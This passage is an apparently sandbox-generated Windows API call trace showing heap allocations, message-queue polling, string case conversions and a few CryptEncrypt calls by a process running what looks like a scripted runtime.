[0176.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.824] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.824] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0176.825] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0176.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0176.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0176.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0176.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0176.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.828] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a30 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0176.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a698b0 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0176.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0176.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0176.828] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0176.829] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0176.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aaaba0 [0176.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaba0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0176.829] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71a68*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71a68*, pdwDataLen=0x8cef60*=0x8) returned 1 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0176.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0176.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0176.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0176.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0176.831] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0176.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.831] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0176.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0176.831] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0176.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0176.832] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0176.832] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.832] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0176.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0176.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0176.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0176.833] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0176.833] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0176.834] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0176.834] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.834] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 